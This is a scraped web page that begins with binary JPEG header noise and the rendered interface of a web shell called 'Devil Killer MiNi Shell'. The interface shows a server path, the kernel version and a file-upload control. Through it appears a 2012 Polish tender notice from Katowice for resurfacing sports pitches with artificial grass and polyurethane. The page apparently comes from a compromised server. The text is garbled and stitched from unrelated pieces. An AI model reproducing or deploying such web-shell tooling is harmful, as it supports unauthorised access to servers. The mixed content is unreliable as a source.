JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120618/206798-N-2012.html

<p class="kh_header"><b>Katowice: wykonanie renowacji nawierzchni poliuretanowej i wymiana nawierzchni ze sztucznej trawy na Ośrodku Sportowym Słowian</b><br>
<b>Numer ogłoszenia: 206798 - 2012; data zamieszczenia: 18.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , Aleja Korfantego 35, 40-005 Katowice, woj. śląskie, tel. 32 258 53 55, 253 87 33, faks 32 253 87 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.katowice.pl/jednostki/mosir</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa miasta Katowice nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie renowacji nawierzchni poliuretanowej i wymiana nawierzchni ze sztucznej trawy na Ośrodku Sportowym Słowian.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi (z uwzględnieniem postanowień art. 30 ustawy) wykonanie renowacji nawierzchni poliuretanowej i wymiana nawierzchni ze sztucznej trawy na Ośrodku Sportowym Słowian w Katowicach przy ulicy 1 go Maja 99,  w tym:
1.Wymianę nawierzchni na boisku do piłki nożnej ze sztucznej trawy:
-roboty pomiarowe
-demontaż istniejącej nawierzchni z trawy syntetycznej wraz z kosztem transportu i utylizacji
-demontaż istniejącego sprzętu sportowego i montaż po wykonaniu robót remontowych
-wykonanie nowej nawierzchni ze sztucznej trawy
-wykonanie piłkochwytów
-osadzenie tulei do słupków i stojaków
-ustawienie w gotowych otworach bramek
2.Renowacja nawierzchni poliuretanowej
-demontaż istniejącej nawierzchni
-demontaż istniejącego sprzętu sportowego 
-wykonanie nowej nawierzchni poliuretanowej
-osadzenie tulei do słupków i stojaków
-ustawienie w gotowych otworach stojaków do siatkówki
Zakres prac został przedstawiony w kosztorysie inwestorskim i opisany za pomocą specyfikacji technicznych.
Opis prac:
1.Wymiana nawierzchni na boisku do piłki nożnej ze sztucznej trawy:
-roboty pomiarowe
-demontaż istniejącej nawierzchni z trawy syntetycznej wraz z kosztem transportu i utylizacji
-demontaż istniejącego sprzętu sportowego i montaż po wykonaniu robót remontowych
-wykonanie nowej nawierzchni ze sztucznej trawy
Nawierzchnia sportowa do piłki nożnej o następujących parametrach:
1. Typ włókna: 100 % włókien monofilowych 
2. Wysokość włókna: min.60 mm 
3. Skład che?miczny włókna: polietylen (PE) lub polipropylen 
4. Ciężar włókna: powyżej 13.000 Dtex, 
5. Ilość włókien : od 115.000 do 140.000 włókien /m2 
6. Wypełnienie trawy: granulat EPDM z produkcji pierwotnej lub granulat termoplastyczny o zawartości kauczuku powyżej 20%. Kolor granulatu: zielony lub szary (bezwonny), nie dopuszcza się braku wypełnienia 
7. Kolor nawierzchni - zielony (możliwe dwa odcienie) 
8. Li?nie segregacyjne białe - wklejone w nawierzchnię. 
9. Grubość włókna w miejscu wtopienia rdzenia - min. 300 mikronów
-wykonanie piłkochwytów
Wykonanie piłkochwytów 60 cm przed linią ogrodzenia boiska o wysokości 6,0 m poprzez przedłużenie istniejących słupków na krótszych bokach boiska do wysokości 6 m, montaż wsporników szerokości 60cm i luźno wiszącej propylenowej siatki
-osadzenie tulei do słupków i stojaków
-ustawienie w gotowych otworach bramek

Wymagane dokumenty dla powyższej nawierzchni:
1.Karta techniczna oferowanej sztucznej trawy oraz oferowanego granulatu potwierdzona przez producenta trawy
2.Dokument producenta oferowanej sztucznej trawy potwierdzający minimum 5 letnią gwarancję producenta na ten produkt
3.Dokument producenta oferowanego granulatu potwierdzający minimum 5 letnią gwarancję  producenta granulatu jaki będzie zastosowany wraz z potwierdzeniem producenta sztucznej trawy że oferowany granulat spełnia jego wymagania jakościowe.
4.Świadectwo higieny (atest PZH) dopuszczające oferowaną sztuczną trawę i granulat do użytkowania 
5.Atest Instytutu Ochrony Środowiska dla oferowanego granulatu i oferowanej sztucznej trawy.
2.  Renowacja nawierzchni poliuretanowej
-demontaż istniejącej nawierzchni
-demontaż istniejącego sprzętu sportowego 
-wykonanie nowej nawierzchni poliuretanowej
Przedmiotem zamówienia jest wymiana nawierzchni poliuretanowej na nową syntetyczną wykonaną w technologii natrysk.  
Kolorystyka nawierzchni: Projektuje się nawierzchnię w dwóch kolorach czerwonym i zielonym. Linie o szerokości 5 cm oznaczające pola do poszczególnych gier proponuje się w kolorach: białym, zielonym, żółtym, niebieskim lub czarnym. Kolory linii boiska do piłki ręcznej i do siatkówki  uzgodnione zostaną  z wybranym Wykonawcą. 
ETAPOWOŚĆ WYKONANIA ROBÓT: 
Roboty przygotowawcze: 
W ramach tych prac planuje się rozebranie istniejącej nawierzchni poliuretanowej i wyrównanie istniejącej podbudowy betonowej poprzez  sfrezowanie. 
Materiał pochodzący z rozbiórki należy środkami transportu kołowego wywieźć na miejsce utylizacji. 
Obrzeża: 
Uszkodzone obrzeża należy wymienić na nowe. Przyjęto 20 % obrzeży do wymiany. Jako ogranicznik opaski z kostki betonowej należy zastosować obrzeża wibroprasowane  układane na podsypce piaskowej.  
Pod nawierzchnię syntetyczną  zachować należy istniejącą podbudowę betonową. 
Nawierzchnia: 
Na istniejącej podbudowie betonowej wykonuje się warstwę o grubości 12,5 mm. Warstwę elastyczną z czarnego granulatu połaczoną lepiszczem poliuretanowym.
Następnie warstwę 2 mm. Warstwę elastyczną użytkową układaną metodą wysokociśnieniowego natrysku.
Opis i wymagania nowej nawierzchni poliuretanowej:
Całkowita  grubość systemu - minimum 14,5 mm
Warstwa dolna z granulatu EPDM 
Natryskowa warstwa górna z kolorowego granulatu EPDM z produkcji pierwotnej z klejem poliuretanowym 2-3mm
Linie wyznaczające pole poszczególnych dyscyplin malowane natryskowo specjalną farbą poliuretanową odporną na ścieranie w kolorach białym, zielonym, żółtym, niebieskim lub czarnym do uzgodnienia z wybranym Wykonawcą.
Wytrzymałość na rozciąganie - min. 0,4 MPa
Wydłużenie przy zerwaniu - min. 40%
Odkształcenie pionowe - maks 6 mm
Dodatkowo nawierzchnia winna spełniać wymagania określone w normie  EN 14877 dot. wspólczynnika tarcia nawierzchni suchych i mokrych, badanego z zastosowaniem gumy CEN, precyzujące, że średnia wartość wahadła badawczego powinna się mieścić w zakresie 55-110, przy zastrzeżeniu że żadne pojedyncze badanie nie powino różnić się od średniej nie więcej niż o 4 jednostki oraz odporności na zużycie - ubytek masy po 1000 cyklach określany w gramach nie powinien być większy niż 4g dla każdej nawierzchni syntetycznej.
Amortyzacja siły 25-60%
Wymagane dokumenty dla powyższej nawierzchni:
1.Karta techniczna oferowanej nawierzchni
2.Dokument producenta oferowanej nawierzchni potwierdzający minimum 5 letnia gwarancję producenta na ten produkt
3.Świadectwo higieny (atest PZH) dopuszczające oferowaną nawierzchnię do użytkowania 
4.Dokument potwierdzający że oferowana nawierzchnia spełnia wymagania określone w normie EN 14877
5.Atest Instytutu Ochrony Środowiska dla oferowanej nawierzchni

-osadzenie tulei do słupków i stojaków
-ustawienie w gotowych otworach stojaków do siatkówki
Wykonawcy zobowiązani są do złożenia wraz z ofetą próbki oferowanej sztucznej trawy i oferowanego granulatu oraz oferowanej nawierzchni.  Sugerowany wymiar próbek: ok. 200/250 mm.  Nie dostarczenie próbek skutkować będzie odrzuceniem oferty. 
Wizje lokalne:
Zamawiający zaleca przeprowadzenie  wizji lokalnej terenu inwestycji. 
Zamawiający wyznacza termin wizji lokalnej na dzień 21.06.2012 roku godz. 9.00. Zbiórka : Ośrodek Sportowy Słowian ulica 1 go Maja 99, w holu budynku.
Koszty związane z przeprowadzeniem wizji lokalnej ponosi samodzielnie każdy Wykonawca. Każdy Wykonawca ponosi również wyłączną odpowiedzialność za treść uzyskanej informacji oraz za wszelkie straty lub szkody powstałe jako następstwo wizji lokalnej terenu inwestycji.
Wszędzie tam, gdzie w opisie przedmiotu zamówienia w niniejszej SIWZ i załącznikach wskazane zostały symbole, nazwy producenta, normy i znaki towarowe dopuszcza się zastosowanie materiałów równoważnych, tj. o nie gorszych parametrach, niż opisane przez Zamawiającego.
Załączony do SIWZ kosztorys zerowy zawiera szczegółowy obmiar robót, natomiast szczegółowy zakres prac opisany został w opracowaniu pn. Wykonanie renowacji nawierzchni poliuretanowej i wymiany nawierzchni ze sztucznej trawy na Ośrodku Sportowym SŁOWIAN w Katowicach przy ulicy 1 go Maja 99 (zał. do SIWZ).
W niniejszym postępowaniu Zamawiający dopuszcza możliwość powierzenia wykonania zamówienia podwykonawcom. Jeśli zamówienie zostanie powierzone podwykonawcom - Wykonawca w swojej ofercie musi wskazać, którą część będzie wykonywał podwykonawca oraz może podać nazwę i adres podwykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 18.3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jesli Wykonawca wykaże, że wykonał  samodzielnie lub wspólnie w rozumieniu art. 23 ustawy jedno zadanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie tj. robotę budowlaną w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia oraz poda rodzaj i wartość robót, daty i miejsca wykonania i załączy dokumenty potwierdzające  że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Przez robotę budowlaną o której mowa wyżej rozumie się wykonanie, naprawa lub renowacja boiska ze sztuczną trawą o powierzchni minimum 1700 m2 i boiska sportowego o nawierzchni poliuretanowej o powierzchni minimum 800 m2.
Uwaga! Zamawiający  dopuszcza złożenie jednego dokumentu potwierdzającego wykonanie obu robót budowlanych  lub dwóch oddzielnych dokumentów na poszczególne zadania.
Ocena spełniania warunku odbędzie się na podstawie złożonych dokumentów i oświadczeń na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 18.3 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeśli Wykonawca wykaże że dysponuje  osobami zdolnymi do wykonania zamówienia tj. wykaże osoby które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakres wykonywanych przez nie czynności, oraz przedstawią informację o podstawie do dysponowania tymi osobami oraz złoży pisemne oświadczenie, że osoby które będą wykonywać zamówienie posiadają  niżej określone uprawnienia: 
Kierownik budowy - uprawnienia budowlane w  specjalności konstrukcyjno - budowlanej, 
Kierownik robót - uprawnienia budowlane w specjalności drogowej 
lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadają aktualne zaświadczenia o przynależności do właściwej Okręgowej Izby Samorządu Zawodowego w oparciu o art. 6 ust.1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów inżynierów oraz urbanistów (Dz. U. z 2001r Nr 5 poz.42 ze zm.). 
Ocena spełniania warunku odbędzie się na podstawie złożonych dokumentów i oświadczeń na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 18.3 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.oferta na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym załącznik  do SIWZ.
2.szczegółowy kosztorys ofertowy, sporządzony zgodnie z kosztorysem zerowym stanowiącym załącznik do SIWZ. Kosztorys musi uwzględniać wszystkie pozycje kosztorysu zerowego.
3.oświadczenie Wykonawcy, o treści określonej w art. 22 ust.1 ustawy - że wykonawca może ubiegać się o udzielenie zamówienia, wg wzoru stanowiącego załącznik do  SIWZ.
Oferty wspólne:
1.W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii. 
2.Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.
3.Zamawiający przy ocenie spełnienia warunków będzie rozpatrywał podane informacje łącznie 
z zastrzeżeniem, że dokumenty wymienione w punkcie 18 ppkt 6 litery a-d  SIWZ muszą przedstawić dla każdego z partnerów Konsorcjum lub wspólników spółki osobno.
4.Dokumenty załączone do oferty winne być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez osoby upoważnione do składania oświadczeń woli w imieniu wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana treści umowy:
1.zmiana treści  umowy może nastąpić wyłącznie w granicach unormowania art. 144 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie Strony.
2.Zamawiający dopuszcza możliwość dokonania zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w zakresie:
1)zaistnienia nadzwyczajnej okoliczności której nie można było przewidzieć w chwili zawarcia umowy wynikającej z potrzeby zmiany np. koncepcji realizacji inwestycji, dokumentacji, a zmiana ta jest korzystna dla Zamawiającego,
2)konieczności zmiany osób wskazanych jako kierownik budowy/robót i przedstawiciel Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl/jednostki/mosir<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji Aleja Korfantego 35 40-005 Katowice pokój numer 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji Aleja Korfantego 35 40-005 Katowice pokój numer 8-sekretariat Ośrodka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





